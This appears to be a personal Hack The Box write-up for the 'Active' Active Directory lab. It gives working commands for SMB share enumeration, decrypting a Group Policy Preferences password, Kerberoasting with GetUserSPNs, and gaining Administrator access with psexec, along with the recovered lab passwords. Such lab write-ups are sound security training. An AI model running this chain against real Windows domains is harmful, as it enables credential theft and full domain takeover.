Comment on page
HTB Write-up Active (Windows) - Active Directory
What I learned today:
Nmap Scan Result:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-11 03:58:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-02-11T03:59:42
|_ start_date: 2022-02-11T03:56:29
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
All port scans
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
49152/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
tried kerbrute:
no luck on other usernames so far.
SMB enum:
I got some shares.
Let's do more SMB enum.
enum4linux is outdated and didn't give me much useful info.
For SMB enum, use smbmap!
smbmap -H 10.129.138.208
shows what permission we have!
\To find out the actual host name, do some nslookup:
It shows that we have read access on Replication! TIP: smbclient -L lists but to connect just do smbclient IP/FILESHARE
now we have access to replication share!
Nslookup
- 1.set the server name as the target IP
- 2.ask who's 127.0.0.1
- 3.if it doesn't show ask who's TARGET_IP ( in this case, it times out)
dnsrecon to scan the entire subnet
NEW: dnsrecon -d 10.129.138.208 -r 10.129.138.208/8 --depth 10
didn't work well this time.
Search through the directories in the user share with:
smbmap -H 10.129.138.208 -R Replication --depth 10
found a group policy file: groups.xml
Download the file with
smbmap -H 10.129.138.208 -R Replication -A Groups.xml -q --depth 10
-q quiet
-A downloads a file if it's available.
saves the file to 10.129.138.208-Replication_active.htb_Policies...
Grouppolicy password is encrypted.
Decrypted it via
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Now that we have a password, let's do
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.129.138.208
Used GetUserSPNs to dump hashes.
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.129.138.208 -request
hashcat it
�
pass for the administrator is Ticketmaster1968
Now that we have the password, let's use the psexec.py to escalate priviledge
psexec.py active.htb/Administrator:[email protected]
We are in the system!
Last modified 1yr ago